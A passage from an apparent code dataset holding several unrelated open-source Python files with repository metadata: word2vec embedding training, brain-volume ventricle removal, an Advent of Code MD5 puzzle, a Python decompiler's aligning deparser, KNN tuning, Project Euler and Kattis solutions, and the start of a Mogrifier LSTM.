type=int,\n help='the min number of ngram size')\n parser.add_argument('--max_gram', default=5, type=int,\n help='the max number of ngram size')\n parser.add_argument('--out_type', '-o', choices=['hsm', 'ns', 'original'],\n default='ns',\n help='output model type (\"hsm\": hierarchical softmax, '\n '\"ns\": negative sampling, \"original\": no approximation)')\n parser.add_argument('--path_vocab',\n default='',\n help='path to the vocabulary', required=False)\n parser.add_argument('--path_word2chars',\n default='', help='path to the word2chars file, this is only used for japanese bushus',\n required=False)\n parser.add_argument('--path_vocab_ngram_tokens',\n default='',\n help='path to the vocabulary of ngram tokens (used for subword models)', required=False)\n parser.add_argument('--path_corpus', help='path to the corpus', required=True)\n parser.add_argument('--path_out', help='path to save embeddings', required=True)\n parser.add_argument('--test', dest='test', default=False, action='store_true')\n parser.add_argument('--verbose', default=False, help='verbose mode', action='store_true', required=False)\n\n args = parser.parse_args()\n return args\n\n\ndef print_params(args):\n print('GPU: {}'.format(args.gpu))\n print('dimensions: {}'.format(args.dimensions))\n print('Window: {}'.format(args.window))\n print('Minibatch-size: {}'.format(args.batchsize))\n print('# epoch: {}'.format(args.epoch))\n print('Training model: {}'.format(args.model))\n print('Output type: {}'.format(args.out_type))\n print('')\n\n\ndef get_word2chars(path):\n word2chars = {}\n with open(path, 'r') as input_file:\n for line in input_file.readlines():\n tokens = line.split()\n word2chars[tokens[0]] = tokens[1]\n return word2chars\n\n\nclass SoftmaxCrossEntropyLoss(chainer.Chain):\n\n def __init__(self, n_in, n_out):\n super(SoftmaxCrossEntropyLoss, self).__init__()\n with self.init_scope():\n self.out = L.Linear(n_in, n_out, initialW=0)\n\n def __call__(self, x, t):\n return F.softmax_cross_entropy(self.out(x), t)\n\n\ndef get_loss_func(args, vocab_context):\n word_counts = vocab_context.lst_frequencies\n if args.out_type == 'hsm':\n HSM = L.BinaryHierarchicalSoftmax\n d_counts = {i: word_counts[i] for i in range(len(word_counts))}\n tree = HSM.create_huffman_tree(d_counts)\n loss_func = HSM(args.dimensions, tree)\n loss_func.W.data[...] = 0\n elif args.out_type == 'ns':\n cs = [word_counts[w] for w in range(len(word_counts))]\n loss_func = L.NegativeSampling(args.dimensions, cs, args.negative_size)\n loss_func.W.data[...] 
= 0\n elif args.out_type == 'original':\n loss_func = SoftmaxCrossEntropyLoss(args.dimensions, vocab_context.cnt_words)\n\n return loss_func\n\n\ndef get_model(args, loss_func, vocab, vocab_ngram_tokens, current_utils=utils.word):\n model = None\n if args.subword == 'none':\n if args.model == 'skipgram':\n model = current_utils.SkipGram(vocab.cnt_words, args.dimensions, loss_func)\n if args.model == 'cbow':\n # todo only skipgram supported\n model = current_utils.ContinuousBoW(vocab.cnt_words, args.dimensions, loss_func)\n else:\n if args.model == 'skipgram':\n model = utils.subword.SkipGram(args.subword, vocab, vocab_ngram_tokens, args.dimensions, loss_func, )\n\n if model is None:\n raise Exception('Unknown model and word/subword type: {} \"and\" {}'.format(args.model, args.subword))\n return model\n\n\n#@training.make_extension(trigger=(1, 'epoch'))\n#def dump_embs(trainer):\n# print(\"dumping embeddings\")\nclass EmbedDumper(training.Extension):\n\n def __init__(self, params, vocab):\n self.params = params\n self.vocab = vocab\n self.time_start = timer()\n # def initialize(self, trainer):\n # pass\n\n def __call__(self, trainer):\n # print(\"dumping embeddings\")\n epoch = trainer.updater.epoch\n net = trainer.updater._optimizers[\"main\"].target\n save_embeddings(self.params[\"path_out\"],\n epoch,\n net,\n self.vocab, self.params,\n timer() - self.time_start)\n\n\ndef save_embeddings(path, epoch, model, vocab, metadata, execution_time):\n path = Path(path)\n embeddings = WordEmbeddingsDense()\n embeddings.vocabulary = vocab\n embeddings.metadata.update(metadata)\n embeddings.metadata[\"vocabulary\"] = vocab.metadata\n embeddings.metadata[\"epoch\"] = epoch\n embeddings.metadata[\"vecto_version\"] = vecto.__version__\n embeddings.matrix = cuda.to_cpu(model.getEmbeddings(gpu=metadata[\"gpu\"]))\n if metadata[\"out_type\"] == 'ns':\n model.matrix_context = cuda.to_cpu(model.getEmbeddings_context())\n else:\n model.matrix_context = cuda.to_cpu(model.loss_func.out.W.data)\n embeddings.metadata[\"execution_time\"] = execution_time #time_end - time_start\n embeddings.metadata[\"embeddings_type\"] = \"vanilla\"\n path_out = path / f\"ep_{epoch:03}\"\n embeddings.save_to_dir(path_out)\n\n embeddings.matrix = model.matrix_context\n embeddings.metadata[\"embeddings_type\"] = \"context\"\n embeddings.save_to_dir(os.path.join(path_out, 'context'))\n\n\ndef train(args):\n if args.subword == 'none':\n current_utils = utils.word\n else:\n current_utils = utils.subword\n current_utils.args = args\n\n if args.gpu >= 0:\n chainer.cuda.get_device_from_id(args.gpu).use()\n cuda.check_cuda_available()\n\n if args.path_vocab == '':\n vocab = create_from_path(args.path_corpus, language=args.language)\n else:\n vocab = Vocabulary()\n vocab.load(args.path_vocab)\n logger.info(\"loaded vocabulary\")\n\n if args.context_representation != 'word': # for deps or ner context representation, we need a new context vocab for NS or HSM loss function.\n vocab_context = create_from_annotated_dir(args.path_corpus, representation=args.context_representation)\n else:\n vocab_context = vocab\n\n vocab_ngram_tokens = None\n if args.subword != 'none':\n if args.path_vocab_ngram_tokens == '':\n vocab_ngram_tokens = create_ngram_tokens_from_dir(args.path_corpus, args.min_gram, args.max_gram)\n else:\n vocab_ngram_tokens = Vocabulary()\n vocab_ngram_tokens.load(args.path_vocab_ngram_tokens)\n\n if args.path_word2chars == '':\n word2chars = None\n else:\n word2chars = get_word2chars(args.path_word2chars)\n\n loss_func = 
get_loss_func(args, vocab_context)\n model = get_model(args, loss_func, vocab, vocab_ngram_tokens, current_utils)\n\n if args.gpu >= 0:\n model.to_gpu()\n logger.debug(\"model sent to gpu\")\n\n optimizer = chainer.optimizers.Adam()\n optimizer.setup(model)\n save_embeddings(args.path_out, 0, model, vocab, vars(args), 0)\n\n if os.path.isfile(args.path_corpus):\n # todo for file corpus\n pass\n else:\n if args.subword == 'none':\n train_iter = current_utils.DirWindowIterator(path=args.path_corpus, vocab=vocab, window_size=args.window,\n batch_size=args.batchsize, language=args.language)\n else:\n train_iter = current_utils.DirWindowIterator(path=args.path_corpus, vocab=vocab,\n vocab_ngram_tokens=vocab_ngram_tokens, word2chars=word2chars,\n window_size=args.window, batch_size=args.batchsize,\n language=args.language)\n updater = training.StandardUpdater(train_iter, optimizer, converter=current_utils.convert, device=args.gpu)\n trainer = training.Trainer(updater, (args.epoch, 'epoch'), out=args.path_out)\n\n if os.path.isfile(args.path_corpus):\n # todo for file corpus\n # trainer.extend(extensions.Evaluator(val_iter, model, converter=convert, device=args.gpu))\n # trainer.extend(extensions.PrintReport(['epoch', 'main/loss', 'validation/main/loss', 'elapsed_time']))\n pass\n else:\n trainer.extend(extensions.PrintReport(['epoch', 'main/loss', 'elapsed_time']))\n trainer.extend(extensions.ProgressBar())\n trainer.extend(extensions.LogReport())\n trainer.extend(EmbedDumper(vars(args), vocab), trigger=(1, 'epoch'))\n trainer.run()\n\n\ndef run(args):\n train(args)\n\n logger.info(\"model saved to \" + args.path_out)\n\n\ndef main():\n args = parse_args()\n print_params(args)\n\n run(args)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"vecto-ai/vecto","sub_path":"vecto/embeddings/train_word2vec.py","file_name":"train_word2vec.py","file_ext":"py","file_size_in_byte":11728,"program_lang":"python","lang":"en","doc_type":"code","stars":62,"dataset":"github-code","pt":"21"} +{"seq_id":"41401510548","text":"#!python\n# -*- coding: utf-8 -*-\n#\n# This software and supporting documentation are distributed by\n# Institut Federatif de Recherche 49\n# CEA/NeuroSpin, Batiment 145,\n# 91191 Gif-sur-Yvette cedex\n# France\n#\n# This software is governed by the CeCILL license version 2 under\n# French law and abiding by the rules of distribution of free software.\n# You can use, modify and/or redistribute the software under the\n# terms of the CeCILL license version 2 as circulated by CEA, CNRS\n# and INRIA at the following URL \"http://www.cecill.info\".\n#\n# As a counterpart to the access to the source code and rights to copy,\n# modify and redistribute granted by the license, users are provided only\n# with a limited warranty and the software's author, the holder of the\n# economic rights, and the successive licensors have only limited\n# liability.\n#\n# In this respect, the user's attention is drawn to the risks associated\n# with loading, using, modifying and/or developing or reproducing the\n# software by the user in light of its specific status of free software,\n# that may mean that it is complicated to manipulate, and that also\n# therefore means that it is reserved for developers and experienced\n# professionals having in-depth computer knowledge. 
Users are therefore\n# encouraged to load and test the software's suitability as regards their\n# requirements in conditions enabling the security of their systems and/or\n# data to be ensured and, more generally, to use and operate it in the\n# same conditions as regards security.\n#\n# The fact that you are presently reading this means that you have had\n# knowledge of the CeCILL license version 2 and that you accept its terms.\n\n\"\"\" Remove ventricle from a volume through the automatic labelled graph\nby Morphologist.\nBe careful :\nWith the BIDS argument, the session-acquisition-run Morphologist folder\nshould be replaced by a '*' in the argument.\n\"\"\"\n\nimport argparse\nimport glob\nimport re\nimport sys\nfrom os.path import abspath, basename, join, exists, isdir\nimport numpy as np\nfrom p_tqdm import p_map\nfrom soma import aims\n\nfrom deep_folding.brainvisa import exception_handler\nfrom deep_folding.brainvisa.utils.folder import create_folder\nfrom deep_folding.brainvisa.utils.subjects import get_number_subjects\nfrom deep_folding.brainvisa.utils.subjects import select_subjects_int\nfrom deep_folding.brainvisa.utils.logs import setup_log\nfrom deep_folding.brainvisa.utils.parallel import define_njobs\nfrom deep_folding.brainvisa.utils.quality_checks import \\\n compare_number_aims_files_with_expected\nfrom deep_folding.config.logs import set_file_logger\n\n# Import constants\nfrom deep_folding.brainvisa.utils.constants import \\\n _ALL_SUBJECTS, _SRC_DIR_DEFAULT, \\\n _SKELETON_DIR_DEFAULT, _SIDE_DEFAULT, \\\n _PATH_TO_GRAPH_DEFAULT\n\n_OUTPUT_DIR_DEFAULT = join(_SKELETON_DIR_DEFAULT, \"without_ventricle\")\n_SRC_FILENAME_DEFAULT = \"skeleton_generated\"\n_OUTPUT_FILENAME_DEFAULT = \"skeleton_generated_without_ventricle\"\n_LABELLING_SESSION_DEFAULT = \"deepcnn_session_auto\"\n\n# Defines logger\nlog = set_file_logger(__file__)\n\n\ndef remove_ventricle_from_graph(volume_file, labelled_graph_file):\n volume = aims.read(volume_file)\n arr = np.asarray(volume)\n labelled_graph = aims.read(labelled_graph_file)\n for vertex in labelled_graph.vertices():\n if \"label\" in vertex:\n label = vertex[\"label\"]\n if label.startswith(\"ventricle\"):\n for bucket_name in ('aims_other', 'aims_ss',\n 'aims_bottom'):\n bucket = vertex.get(bucket_name)\n if bucket is not None:\n voxels = np.array(bucket[0].keys())\n if voxels.shape == (0,):\n continue\n for i, j, k in voxels:\n arr[i, j, k] = 0\n return volume\n\n\ndef parse_args(argv):\n \"\"\"Parses command-line arguments\n Args:\n argv: a list containing command line arguments\n Returns:\n args\n \"\"\"\n\n # Parse command line arguments\n parser = argparse.ArgumentParser(\n prog=basename(__file__),\n description=\"Generate volumes without ventricle.\")\n parser.add_argument(\n \"-s\", \"--src_dir\", type=str, default=_SKELETON_DIR_DEFAULT,\n help=\"Directory where are the files you want ventricle \"\n \"to be removed from.\"\n f\"Default is : {_SKELETON_DIR_DEFAULT}\")\n parser.add_argument(\n \"-o\", \"--output_dir\", type=str, default=_OUTPUT_DIR_DEFAULT,\n help=\"Output directory where to put the files without ventricle. \"\n f\"Default is : {_OUTPUT_DIR_DEFAULT}\")\n parser.add_argument(\n \"-m\", \"--morpho_dir\", type=str, default=_SRC_DIR_DEFAULT,\n help=\"Directory where the graph data lies. It has to point directly to\"\n \"the morphologist directory containing the subjects \"\n \"as subdirectories. 
\"\n f\"Default is : {_SRC_DIR_DEFAULT}\")\n parser.add_argument(\n \"-p\", \"--path_to_graph\", type=str,\n default=_PATH_TO_GRAPH_DEFAULT,\n help=\"Relative path to graph. \"\n \"In BIDS format, the session_acquisition_run directory \"\n \"have to be replaced by *. \"\n f\"Default is : {_PATH_TO_GRAPH_DEFAULT}\")\n parser.add_argument(\n \"-l\", \"--labelling_session\",\n default=_LABELLING_SESSION_DEFAULT,\n help=\"Name of the labelling session in Morphologist tree. \"\n f\"Default is : {_LABELLING_SESSION_DEFAULT}\")\n parser.add_argument(\n \"-f\", \"--src_filename\", type=str,\n default=_SRC_FILENAME_DEFAULT,\n help=\"Filename of source files. \"\n \"Format is : _.nii.gz \"\n f\"Default is : {_SRC_FILENAME_DEFAULT}\")\n parser.add_argument(\n \"-e\", \"--output_filename\", type=str, default=_OUTPUT_FILENAME_DEFAULT,\n help=\"Filename of output files. \"\n \"Format is : _.nii.gz \"\n f\"Default is : {_OUTPUT_FILENAME_DEFAULT}\")\n parser.add_argument(\n \"-i\", \"--side\", type=str, default=_SIDE_DEFAULT,\n help=\"Hemisphere side (either L, R or F)\"\n f\"Default is : {_SIDE_DEFAULT}\")\n parser.add_argument(\n \"-b\", \"--bids\", default=False, action=\"store_true\",\n help=\"if the database uses BIDS format\"\n \"Default is : False\")\n parser.add_argument(\n \"-a\", \"--parallel\", default=False, action='store_true',\n help='if set (-a), launches computation in parallel')\n parser.add_argument(\n \"-n\", \"--nb_subjects\", type=str, default=\"all\",\n help='Number of subjects to take into account, or \\'all\\'. '\n '0 subject is allowed, for debug purpose.'\n 'Default is : all')\n parser.add_argument(\n '-v', '--verbose', action='count', default=0,\n help='Verbose mode: '\n 'If no option is provided then logging.INFO is selected. '\n 'If one option -v (or -vv) or more is provided '\n 'then logging.DEBUG is selected.')\n\n args = parser.parse_args(argv)\n dico_suffix = {\"R\": \"right\", \"L\": \"left\", \"F\": \"full\"}\n setup_log(args,\n log_dir=f\"{args.output_dir}\",\n prog_name=basename(__file__),\n suffix=dico_suffix[args.side])\n\n params = vars(args)\n\n params['output_dir'] = abspath(args.output_dir)\n params['morpho_dir'] = abspath(args.morpho_dir)\n params['src_dir'] = abspath(args.src_dir)\n # Checks if nb_subjects is either the string \"all\" or a positive integer\n params['nb_subjects'] = get_number_subjects(args.nb_subjects)\n\n return params\n\n\nclass RemoveVentricleFromVolume:\n \"\"\"Class to remove ventricle from volume files through the automatic\n labelling graph computed by Morphologist. 
The default automatic labelling\n session is : deepcnn_session_auto.\n\n It contains all the information to get labelled graphs from volume\n filenames and to write new volumes without ventricle in the target\n directory.\n \"\"\"\n\n def __init__(self, src_dir, output_dir,\n morpho_dir, path_to_graph, labelling_session,\n src_filename, output_filename,\n side, bids, parallel):\n\n self.side = side\n self.bids = bids\n self.parallel = parallel\n self.morpho_dir = morpho_dir\n self.path_to_graph = path_to_graph\n self.labelling_session = labelling_session\n self.src_dir = join(src_dir, self.side)\n self.output_dir = join(output_dir, self.side)\n create_folder(abspath(self.output_dir))\n\n self.expr = f\"{self.side}{src_filename}_(.*).nii.gz$\"\n self.src_file = f\"%(side)s{src_filename}_%(subject)s.nii.gz\"\n self.output_file = f\"%(side)s{output_filename}_%(subject)s.nii.gz\"\n\n def remove_ventricle_from_one_subject(self, subject: str):\n \"\"\" Removes ventricle and writes new volume file for one subject.\n \"\"\"\n\n sbj = {\"subject\": subject, \"side\": self.side}\n\n src_file = join(self.src_dir, self.src_file % sbj)\n\n output_file = join(self.output_dir, self.output_file % sbj)\n\n labelled_graph_list = self.get_labelled_graph(subject)\n\n log.debug(f\"src_file = {src_file}\")\n log.debug(f\"labelled_graphs = {labelled_graph_list}\")\n log.debug(f\"output_file = {output_file}\")\n\n if exists(src_file):\n for graph_file in labelled_graph_list:\n if exists(graph_file):\n volume = remove_ventricle_from_graph(\n src_file, graph_file)\n else:\n raise FileNotFoundError(f\"Labelled graph not found : \\\n {graph_file}\")\n aims.write(volume, output_file)\n else:\n raise FileNotFoundError(f\"Source file not found : \\\n {src_file}\")\n\n def get_labelled_graph(self, subject: str):\n \"\"\" Find the labelled graph in the morphologist database from the\n source filename.\n \"\"\"\n labelled_graph_list = []\n side_list = [\"L\", \"R\"] if self.side == \"F\" else [self.side]\n if subject.startswith(\"_\"):\n subject = subject[1:]\n for side in side_list:\n if self.bids:\n split = subject.split(\"_\")\n subject_id = split[0]\n if len(split) > 1:\n keys = \"_\".join(split[1:])\n else:\n keys = \"\"\n log.warning(f\"The subject {subject} has no session, acquisition or run.\")\n filename = f\"{side}{subject_id}_{self.labelling_session}.arg\"\n labelled_graph_file = join(\n self.morpho_dir, subject_id, self.path_to_graph.replace(\n \"*\", keys), self.labelling_session, filename)\n else:\n filename = f\"{side}{subject}_{self.labelling_session}.arg\"\n labelled_graph_file = join(\n self.morpho_dir,\n subject,\n self.path_to_graph,\n self.labelling_session,\n filename)\n labelled_graph_list.append(labelled_graph_file)\n return labelled_graph_list\n\n def compute(self, number_subjects):\n \"\"\"Loops over subjects and remove ventricle from volumes.\n \"\"\"\n # Gets list of subjects\n log.debug(f\"src_dir = {self.src_dir}\")\n log.debug(f\"reg exp = {self.expr}\")\n\n if isdir(self.src_dir):\n filenames = glob.glob(f\"{self.src_dir}/*.nii.gz\")\n log.debug(f\"Volume files list = {filenames}\")\n\n list_subjects = [re.search(self.expr, basename(filename))[1]\n for filename in filenames\n if not re.search('.minf$', filename)]\n list_subjects = select_subjects_int(list_subjects, number_subjects)\n\n log.info(f\"Expected number of subjects = {len(list_subjects)}\")\n log.info(f\"list_subjects[:5] = {list_subjects[:5]}\")\n log.debug(f\"list_subjects = {list_subjects}\")\n else:\n raise 
NotADirectoryError(\n f\"{self.src_dir} doesn't exist or is not a directory\")\n\n # Performs computation on all subjects either serially or in parallel\n if self.parallel:\n log.info(\n \"PARALLEL MODE: subjects are computed in parallel.\")\n p_map(self.remove_ventricle_from_one_subject,\n list_subjects,\n num_cpus=define_njobs())\n else:\n log.info(\n \"SERIAL MODE: subjects are scanned serially, \"\n \"without parallelism\")\n for sub in list_subjects:\n self.remove_ventricle_from_one_subject(sub)\n\n # Checks if there is expected number of generated files\n compare_number_aims_files_with_expected(self.output_dir, list_subjects)\n\n\ndef remove_ventricle(src_dir=_SRC_DIR_DEFAULT,\n output_dir=_OUTPUT_DIR_DEFAULT,\n morpho_dir=_SRC_DIR_DEFAULT,\n path_to_graph=_PATH_TO_GRAPH_DEFAULT,\n labelling_session=_LABELLING_SESSION_DEFAULT,\n src_filename=_SRC_FILENAME_DEFAULT,\n output_filename=_OUTPUT_FILENAME_DEFAULT,\n side=_SIDE_DEFAULT,\n bids=False,\n parallel=False,\n number_subjects=_ALL_SUBJECTS):\n \"\"\"Remove ventricle from a volume\n through the automatic labelled graph by Morphologist\"\"\"\n\n # Initialization\n removal = RemoveVentricleFromVolume(\n src_dir=src_dir,\n output_dir=output_dir,\n morpho_dir=morpho_dir,\n path_to_graph=path_to_graph,\n labelling_session=labelling_session,\n src_filename=src_filename,\n output_filename=output_filename,\n side=side,\n bids=bids,\n parallel=parallel)\n removal.compute(number_subjects=number_subjects)\n\n\n@exception_handler\ndef main(argv):\n \"\"\"Reads argument line and remove ventricle from volumes\n Args:\n argv: a list containing command line arguments\n \"\"\"\n # Parsing arguments\n params = parse_args(argv)\n\n # Actual API\n remove_ventricle(\n src_dir=params[\"src_dir\"],\n output_dir=params[\"output_dir\"],\n morpho_dir=params[\"morpho_dir\"],\n path_to_graph=params[\"path_to_graph\"],\n labelling_session=params[\"labelling_session\"],\n src_filename=params[\"src_filename\"],\n output_filename=params[\"output_filename\"],\n side=params[\"side\"],\n bids=params[\"bids\"],\n parallel=params['parallel'],\n number_subjects=params['nb_subjects'])\n\n\nif __name__ == '__main__':\n # This permits to call main also from another python program\n # without having to make system calls\n main(argv=sys.argv[1:])\n","repo_name":"neurospin/deep_folding","sub_path":"deep_folding/brainvisa/remove_ventricle.py","file_name":"remove_ventricle.py","file_ext":"py","file_size_in_byte":15043,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"38164919356","text":"import logging\r\nimport os\r\n\r\nimport hashlib\r\n\r\nscript_dir = os.path.dirname(__file__)\r\nscript_name = os.path.splitext(os.path.basename(__file__))[0]\r\n\r\nlog_file = os.path.join(script_dir, f\"logs/{script_name}.log\")\r\nlogging.basicConfig(level=logging.WARNING, filename=log_file, filemode='w',)\r\n\r\ndoor_id = \"ojvtpuvg\"\r\n\r\ninteger = 0\r\ndoor_code = \"\"\r\nwhile True:\r\n input_str = f\"{door_id}{integer}\"\r\n result = hashlib.md5(input_str.encode())\r\n hex_output = result.hexdigest()\r\n if hex_output[0:5] == \"00000\":\r\n door_code += hex_output[5]\r\n print(f\"{integer:>10} - door code: [{door_code + '-' * (8 - len(door_code))}]\")\r\n if len(door_code) == 8:\r\n break\r\n integer += 1\r\n\r\nprint(f\"Part 1: {door_code}\")\r\n\r\n\r\ninteger = 0\r\ndoor_code = \"--------\"\r\nwhile True:\r\n input_str = f\"{door_id}{integer}\"\r\n result = hashlib.md5(input_str.encode())\r\n hex_output = 
result.hexdigest()\r\n if hex_output[0:5] == \"00000\" and hex_output[5] in \"01234567\":\r\n position = int(hex_output[5])\r\n if door_code[position] == \"-\":\r\n door_code = door_code[:position] + hex_output[6] + door_code[position + 1:]\r\n print(f\"{integer:>10} - door code: [{door_code}]\")\r\n if not \"-\" in door_code:\r\n break\r\n integer += 1\r\n\r\nprint(f\"Part 2: {door_code}\")","repo_name":"gid/AoC","sub_path":"Archive/2016/day_5.py","file_name":"day_5.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11114397556","text":"import sys\n\nfrom spark_parser import DEFAULT_DEBUG as PARSER_DEFAULT_DEBUG\nfrom xdis import iscode\n\nfrom xdis.version_info import IS_PYPY\nfrom uncompyle6.scanner import get_scanner\nfrom uncompyle6.semantics.pysource import (\n ASSIGN_DOC_STRING,\n RETURN_NONE,\n SourceWalker,\n SourceWalkerError,\n find_globals_and_nonlocals\n)\nfrom uncompyle6.show import maybe_show_asm\n\n#\n\n\nclass AligningWalker(SourceWalker, object):\n def __init__(\n self,\n version,\n out,\n scanner,\n showast=False,\n debug_parser=PARSER_DEFAULT_DEBUG,\n compile_mode=\"exec\",\n is_pypy=False,\n ):\n SourceWalker.__init__(\n self, version, out, scanner, showast, debug_parser, compile_mode, is_pypy\n )\n self.desired_line_number = 0\n self.current_line_number = 0\n\n def println(self, *data):\n if data and not (len(data) == 1 and data[0] == \"\"):\n self.write(*data)\n\n self.pending_newlines = max(self.pending_newlines, 1)\n\n def write(self, *data):\n if (len(data) == 1) and data[0] == self.indent:\n diff = max(\n self.pending_newlines,\n self.desired_line_number - self.current_line_number,\n )\n self.f.write(\"\\n\" * diff)\n self.current_line_number += diff\n self.pending_newlines = 0\n if (len(data) == 0) or (len(data) == 1 and data[0] == \"\"):\n return\n\n out = \"\".join((str(j) for j in data))\n n = 0\n for i in out:\n if i == \"\\n\":\n n += 1\n if n == len(out):\n self.pending_newlines = max(self.pending_newlines, n)\n return\n elif n:\n self.pending_newlines = max(self.pending_newlines, n)\n out = out[n:]\n break\n else:\n break\n\n if self.pending_newlines > 0:\n diff = max(\n self.pending_newlines,\n self.desired_line_number - self.current_line_number,\n )\n self.f.write(\"\\n\" * diff)\n self.current_line_number += diff\n self.pending_newlines = 0\n\n for i in out[::-1]:\n if i == \"\\n\":\n self.pending_newlines += 1\n else:\n break\n\n if self.pending_newlines:\n out = out[: -self.pending_newlines]\n self.f.write(out)\n\n def default(self, node):\n mapping = self._get_mapping(node)\n if hasattr(node, \"linestart\"):\n if node.linestart:\n self.desired_line_number = node.linestart\n table = mapping[0]\n key = node\n\n for i in mapping[1:]:\n key = key[i]\n pass\n\n if key.type in table:\n self.template_engine(table[key.type], node)\n self.prune()\n\n\nDEFAULT_DEBUG_OPTS = {\"asm\": False, \"tree\": False, \"grammar\": False}\n\n\ndef code_deparse_align(\n co,\n out=sys.stderr,\n version=None,\n is_pypy=None,\n debug_opts=DEFAULT_DEBUG_OPTS,\n code_objects={},\n compile_mode=\"exec\",\n):\n \"\"\"\n ingests and deparses a given code block 'co'\n \"\"\"\n\n assert iscode(co)\n\n if version is None:\n version = float(sys.version[0:3])\n if is_pypy is None:\n is_pypy = IS_PYPY\n\n # store final output stream for case of error\n scanner = get_scanner(version, is_pypy=is_pypy)\n\n tokens, customize = scanner.ingest(co, code_objects=code_objects)\n show_asm = 
debug_opts.get(\"asm\", None)\n maybe_show_asm(show_asm, tokens)\n\n debug_parser = dict(PARSER_DEFAULT_DEBUG)\n show_grammar = debug_opts.get(\"grammar\", None)\n show_grammar = debug_opts.get(\"grammar\", None)\n if show_grammar:\n debug_parser[\"reduce\"] = show_grammar\n debug_parser[\"errorstack\"] = True\n\n # Build a parse tree from tokenized and massaged disassembly.\n show_ast = debug_opts.get(\"ast\", None)\n deparsed = AligningWalker(\n version,\n scanner,\n out,\n showast=show_ast,\n debug_parser=debug_parser,\n compile_mode=compile_mode,\n is_pypy=is_pypy,\n )\n\n is_top_level_module = co.co_name == \"\"\n deparsed.ast = deparsed.build_ast(\n tokens, customize, co, is_top_level_module=is_top_level_module\n )\n\n assert deparsed.ast == \"stmts\", \"Should have parsed grammar start\"\n\n del tokens # save memory\n\n (deparsed.mod_globs, _) = find_globals_and_nonlocals(\n deparsed.ast, set(), set(), co, version\n )\n\n # convert leading '__doc__ = \"...\" into doc string\n try:\n if deparsed.ast[0][0] == ASSIGN_DOC_STRING(co.co_consts[0]):\n deparsed.print_docstring(\"\", co.co_consts[0])\n del deparsed.ast[0]\n if deparsed.ast[-1] == RETURN_NONE:\n deparsed.ast.pop() # remove last node\n # todo: if empty, add 'pass'\n except Exception:\n pass\n\n # What we've been waiting for: Generate Python source from the parse tree!\n deparsed.gen_source(deparsed.ast, co.co_name, customize)\n\n for g in sorted(deparsed.mod_globs):\n deparsed.write(\"# global %s ## Warning: Unused global\\n\" % g)\n\n if deparsed.ERROR:\n raise SourceWalkerError(\"Deparsing stopped due to parse error\")\n return deparsed\n\n\nif __name__ == \"__main__\":\n\n def deparse_test(co):\n \"This is a docstring\"\n deparsed = code_deparse_align(co)\n print(deparsed.text)\n return\n\n deparse_test(deparse_test.__code__)\n","repo_name":"rocky/python-uncompyle6","sub_path":"uncompyle6/semantics/aligner.py","file_name":"aligner.py","file_ext":"py","file_size_in_byte":5530,"program_lang":"python","lang":"en","doc_type":"code","stars":3383,"dataset":"github-code","pt":"37"} +{"seq_id":"38054306395","text":"import random\nfrom KNN import KNearestNeighbor\nfrom dataProcess import loadAll, dataDir\n\ndef findBestK():\n # k_list = [1, 2, 5, 10, 15, 30, 50, 100]\n x_train, y_train, x_valid, y_valid, x_test, y_test = loadAll(valid_idx = 5)\n classifier = KNearestNeighbor()\n\n # Select 10000 train data randomly\n rd_start = random.randint(0, 3 * 10000 - 1)\n xtr = x_train[rd_start:rd_start + 10000]\n ytr = y_train[rd_start:rd_start + 10000]\n xva = x_valid[:2000]\n yva = y_valid[:2000]\n\n # acc lists for plot\n m1_acc = [0]\n m2_acc = [0]\n \n classifier.train(xtr, ytr)\n for k in range(1, 101):\n Ypred_1 = classifier.predict(xva, k, m = 1)\n m1_acc.append(classifier.evaluate(Ypred_1, yva))\n Ypred_2 = classifier.predict(xva, k, m = 2)\n m2_acc.append(classifier.evaluate(Ypred_2, yva))\n # plotAcc()\n\nif __name__ == '__main__':\n findBestK()","repo_name":"liuyi12138/SeedClass_CV","sub_path":"week1/code/findBestK.py","file_name":"findBestK.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25067064570","text":"from math import factorial\n\ndef numberToBase(n, b):\n if n == 0:\n return [0]\n digits = []\n while n:\n digits.append(n % b)\n n //= b\n return digits[::-1]\n\ndef f5(n):\n count = 0\n while n % 5 == 0:\n count += 1\n n //= 5\n return count\n\ndef T5(n):\n count = 0\n for i in range(1, n+1):\n if f5(factorial(2*i-1)) 
< 2*f5(factorial(i)):\n count += 1\n print(i, numberToBase(i, 5))\n return count\n\nprint(T5(10**3))\n\n#For the condition to be satisfied, we require that 5 divides i.\n","repo_name":"arnet95/Project-Euler","sub_path":"euler383.py","file_name":"euler383.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71633979628","text":"\nif __name__ == '__main__':\n numInvs, amtNeeded = map(int, input().split())\n invs = []\n for _ in range(numInvs):\n invs.append(list(map(int, input().split())))\n\n minDays = 10**10\n start, stop = 0, 10**9+1\n while start <= stop:\n mid = (stop + start) // 2\n\n total = 0\n for dayReturn, initCost in invs:\n roi = dayReturn * mid - initCost\n if roi > 0:\n total += roi\n\n if total < amtNeeded:\n start = mid + 1\n elif total > amtNeeded:\n stop = mid - 1\n if mid < minDays:\n minDays = mid\n else:\n minDays = mid\n break\n\n print(minDays)\n","repo_name":"gosueep/Kattis","sub_path":"BinSearch/financialplanning/old_FinancialPlanning.py","file_name":"old_FinancialPlanning.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13713128711","text":"from enum import IntEnum\nfrom typing import Optional, Tuple\n\nimport torch\nfrom torch import nn\nfrom torch.nn.parameter import Parameter\n\n\nclass Dim(IntEnum):\n batch = 0\n seq = 1\n feature = 2\n\n\nclass MogLSTM(nn.Module):\n \"\"\"From: https://github.com/RMichaelSwan/MogrifierLSTM/blob/master/MogrifierLSTM.ipynb\"\"\"\n\n def __init__(self, input_sz: int, hidden_sz: int, mog_iterations: int):\n super().__init__()\n self.input_size = input_sz\n self.hidden_size = hidden_sz\n self.mog_iterations = mog_iterations\n # Define/initialize all tensors\n self.Wih = Parameter(torch.Tensor(input_sz, hidden_sz * 4))\n self.Whh = Parameter(torch.Tensor(hidden_sz, hidden_sz * 4))\n self.bih = Parameter(torch.Tensor(hidden_sz * 